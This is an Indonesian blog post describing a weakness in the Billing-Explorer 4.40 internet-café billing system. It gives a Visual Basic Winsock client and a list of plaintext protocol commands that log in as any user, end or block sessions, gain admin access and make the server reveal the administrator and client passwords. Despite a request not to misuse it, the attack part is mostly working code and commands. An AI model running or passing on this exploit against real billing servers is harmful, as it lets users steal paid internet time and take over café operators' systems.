Kelemahan Billing-Explorer ??
Kali ini saya akan memposting tentang adanya kelemahan dasar pada sistem bililng yang selama ini sering digunakan pada warnet pada umumnya, kelemahan ini semoga segera diperbaiki oleh pembuat billing warnet, dengan demikian resiko yang akan terjadi oelh tangan jail akan segera terselesaikan.
Artikel ini hanya untuk memberi tahukan bahwa semua program aplikasi mempunyai kelemahan karena ini hanya buatan manusia. Kelemahan pada billing explorer warnet akan sedikit terkikis akan adanya versi yang baru. Di bawah ini hanya gambaran kelemahan pada billing explorer pada warnet, namun saya harap ini hanya sebgai bentuk informasi pengetahuan jangan sampai di salh gunakan ya. Terima kasih saya ucapkan sebelumnya.
Selain itu ada beberapa kelemahan lain yang terdapat pada program ini, seperti tidak diproteksinya file executable dengan program-program compress exe, spt UPX,PE-COMPAT ataupun yg lain. ini sangat memudahkan untuk di CRack.
Sekedar info, program yang saya coba adalah Billing-Explorer Ver 4.40 Grand R-14a. yang di compile dengan visual basic v 5.0
Ada beberapa perintah yang dikirim dari client ke server seperti:
XXX$personal$2$HACKER$
kalo saya gak salah artikan perintah diatas, menjadi spt ini:
XXX -> Perintah dari client
$ -> sebagai seperator atau pemisah parameter
personal -> type login yang digunakan user
$ -> sebagai seperator atau pemisah parameter
2 -> No PC Client yang telah di setting
$ -> sebagai seperator atau pemisah parameter
HACKER -> Nama yang digunakan oleh user
Maka kesimpulannya kita bisa login ke program server tanpa program client bawaanya dan kita bisa ganti dengan program kecil buatan sendiri.
Coba anda buat satu project dengan:
1 form, 1 winsock control, 2 commandbutton dan 2 textbox
untuk text1 rubah properti Multiline=True dengan Scrollbars=Both
Private Sub Command1_Click()
SOCK.Close
'// Masukan IPAddress Servernya dengan Port 1500 (default port)
SOCK.Connect "192.168.0.1", "1500"
End Sub
Private Sub Command2_Click()
If SOCK.State = sckConnected Then SOCK.SendData Text2.Text
End Sub
Private Sub SOCK_DataArrival(ByVal bytesTotal As Long)
Dim Data As String
SOCK.GetData Data
Text1.SelText = Data & vbCrLf & String(50, "-") & vbCrLf
End Sub
setelah selesai koding diatas coba anda jalankan, lakukan koneksi keserver dengan menekan tombol command1. Apabila berhasil koneksi ke server coba anda tuliskan beberapa perintah dibawah ini pada textbox2 dan diakhiri dengan menekan tombol Command2.
Perintah:
XXX$passY$2$
perintah diatas digunakan untuk melihat password client dan password server pada PC Client No 2 (dua). hasil data yang dikirim dari server ke client dengan menyertakan perintah diatas akan terlihat seperti ini:
YYY$passY$008$Internet Music$JL. Mardopuro Solo$Email info_008@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it - http://www.billingexplorer.com$111
kalo dilihat pada kata '008' dan '111', ini dapat diartikan sebagai password Administrator dan Password PC Client.
kita bisa klik tombol admin pada program clientnya, dan masukan passwordnya. seperti yang terlihat pada gambar dibawah ini :
anda bisa mencoba beberapa perintah dibawah ini:
1. XXX$personal$2$HACKER$
(Login pada PC no 2 dengan nama user HACKER)
2. XXX$stop$2$HACKER
(untuk logout dari billing)
3. XXX$con$2$HACKER
4. XXX$infod2$2$
5. XXX$ablock$2$
6. XXX$admin$2$Admin
7. XXX$tutup$2$$
Anda bisa cari lagi perintah2 yg lain dengan menggunakan packet snipper seperti 'EtherDetect Packet Sniffer'.
Silakan dicoba di komputer sendiri
Label: Tips And Trik